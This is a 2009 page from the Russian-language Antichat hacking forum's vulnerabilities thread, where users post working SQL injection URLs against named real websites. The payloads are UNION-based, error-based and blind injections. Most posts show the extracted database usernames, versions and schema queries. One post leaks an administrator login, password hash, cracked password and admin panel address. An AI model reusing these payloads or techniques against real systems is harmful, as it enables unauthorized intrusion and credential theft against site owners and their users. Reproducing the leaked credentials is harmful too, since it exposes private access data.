ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7971  
Старый 22.02.2009, 19:47
Аватар для ПаВлУшКа
ПаВлУшКа
Новичок
Регистрация: 08.02.2009
Сообщений: 24
Провел на форуме:
81772

Репутация: 10
Отправить сообщение для ПаВлУшКа с помощью ICQ
По умолчанию

Код:
http://www.rotary9640.org/bookmarks/view_group.php?id=-2+union+select+1,2,version(),4,5,6,7,8--

Последний раз редактировалось jokester; 22.02.2009 в 20:22.. Причина: isc.org.au БОЯН
 
Ответить с цитированием

  #7972  
Старый 22.02.2009, 20:08
Аватар для wildshaman
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


Отправить сообщение для wildshaman с помощью ICQ
По умолчанию

Код:
http://www.ruy.ru/news.html?did=-1+union+select+null,null,null,null,null,null,null,null,null,null,CONVERT(concat_ws(0x3a,user(),Version(),database()),binary),12,13,14,111111111,16,17,18,19,20,21,22,23,24,25,26+--
ruy@localhost:4.1.18-log:ruy
Код:
http://www.veshnyaki.ru/news.html?did=9999+union+select+null,null,null,null,null,null,null,null,9,CONVERT(concat_ws(0x3a,user(),Version(),database()),binary),11,12,13,14,15+--
vesh_vesh@localhost:4.1.18-log:vesh_vesh

Последний раз редактировалось wildshaman; 22.02.2009 в 20:25..
 
Ответить с цитированием

  #7973  
Старый 22.02.2009, 21:52
Аватар для SEWERN
SEWERN
Участник форума
Регистрация: 09.01.2009
Сообщений: 155
Провел на форуме:
2253612

Репутация: 94
По умолчанию

Код:
http://www.ukrgo.com/view_subsection.php?id_subsection=195%20union%20select%201,2,3,user(),5,6--&vd=1_5
Код:
http://www.ukrgo.com/view_subsection.php?id_subsection=195%20union%20select%201,2,3,version(),5,6--&vd=1_5
Код:
http://www.vms.kiev.ua/index.php?kat_id=-1+union+select+1,user()--

Последний раз редактировалось SEWERN; 22.02.2009 в 22:20..
 
Ответить с цитированием

  #7974  
Старый 22.02.2009, 23:35
Аватар для Rubaka
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

http://www.itsonlynatural.us/display.php?t=12/**/UNION/**/SELECT/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,10, 11/**/FROM/**/itonlnatweb_db.auth_user_md5/**/LIMIT/**/1,1/*

admin:a01726b559eeeb5fc287bf0098a22f6c
PASS:@dm1n
админка http://www.itsonlynatural.us/admin

но чото не заходит (((((
 
Ответить с цитированием

  #7975  
Старый 22.02.2009, 23:50
Аватар для попугай
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
http://www.rosrealt.ru/news.php?id=-93+union+select+1,2,3,concat_ws(0x3a,user(),databa se(),version()),5,6,7,8,9,10,11,12,13--
rosrealt@localhost:rosrealt:5.0.26-log


Цитата:
http://www.zfmaster.ru/createstr.php?rid=-20081018135956+union+select+concat_ws(0x3a,databas e(),version(),user()),2,3--
zfmaste0_zfmaster:4.1.22-log:zfmaste0_zuzick@localhost

Последний раз редактировалось попугай; 23.02.2009 в 02:19..
 
Ответить с цитированием

  #7976  
Старый 23.02.2009, 00:01
Аватар для Dimionx
Dimionx
Познающий
Регистрация: 28.08.2008
Сообщений: 39
Провел на форуме:
243087

Репутация: 12
Отправить сообщение для Dimionx с помощью ICQ
По умолчанию

e-portal.com.ua

Код:
http://www.e-portal.com.ua/news.php?id=4+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13

Версия - 5.0.51a-log
Юзер - ukrfoto_user@s8
БД - ukrfoto_db


Таблички:

Код:
http://www.e-portal.com.ua/news.php?id=4+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables
Колонки:

Код:
http://www.e-portal.com.ua/news.php?id=4+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.columns
 
Ответить с цитированием

  #7977  
Старый 23.02.2009, 00:22
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.mediaexpres.ro/index.aspx?id=-36+or+1=@@version

Microsoft SQL Server 2005 - 9.00.3068.00 (Intel X86)
Feb 26 2008 18:15:01
Copyright (c) 1988-2005 Microsoft Corporation
Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 2)


Tables

http://www.mediaexpres.ro/index.aspx?id=-36+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_ SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(SELECT+ALL+ TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES))
 
Ответить с цитированием

  #7978  
Старый 23.02.2009, 00:29
Аватар для [JavaScript]
[JavaScript]
Познающий
Регистрация: 14.02.2009
Сообщений: 45
Провел на форуме:
96296

Репутация: 74
По умолчанию

http://www.dib.ucg.gr/proswpiko_en.php?id=102+union+select+null,null,nul l,null,concat_ws(0x20,user(),database(),version()) ,null,null,null,null,null,null,null,null,null,null/*

PS: Номер поста кругленький
 
Ответить с цитированием

  #7979  
Старый 23.02.2009, 00:39
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.myneletv.ro/index.php?page=40+AND+ASCII(SUBSTRING((select+vers ion()),1,1))>x

x=53,46,48,46,52,53

http://www.myneletv.ro/index.php?page=40+AND+ASCII(SUBSTRING((select+data base()),1,1))>x

x=109,121,110,101,108,101,116,118

http://www.myneletv.ro/index.php?page=40+AND+ASCII(SUBSTRING((select+user ()),1,1))>x

x=109,121,110,101,108,101,116,118,64,108,111,99,97 ,108,104,111,115,116


Version : 5.0.45
Database : myneletv
User : myneletv@localhost
 
Ответить с цитированием

  #7980  
Старый 23.02.2009, 12:06
Аватар для Assembler
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

http://www.dedenksportkampioen.be/?pagina=go.php&item=1&id=1%20union%20select%201,2, version(),4,5,6,7,8,9--

4.1.22-standard
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ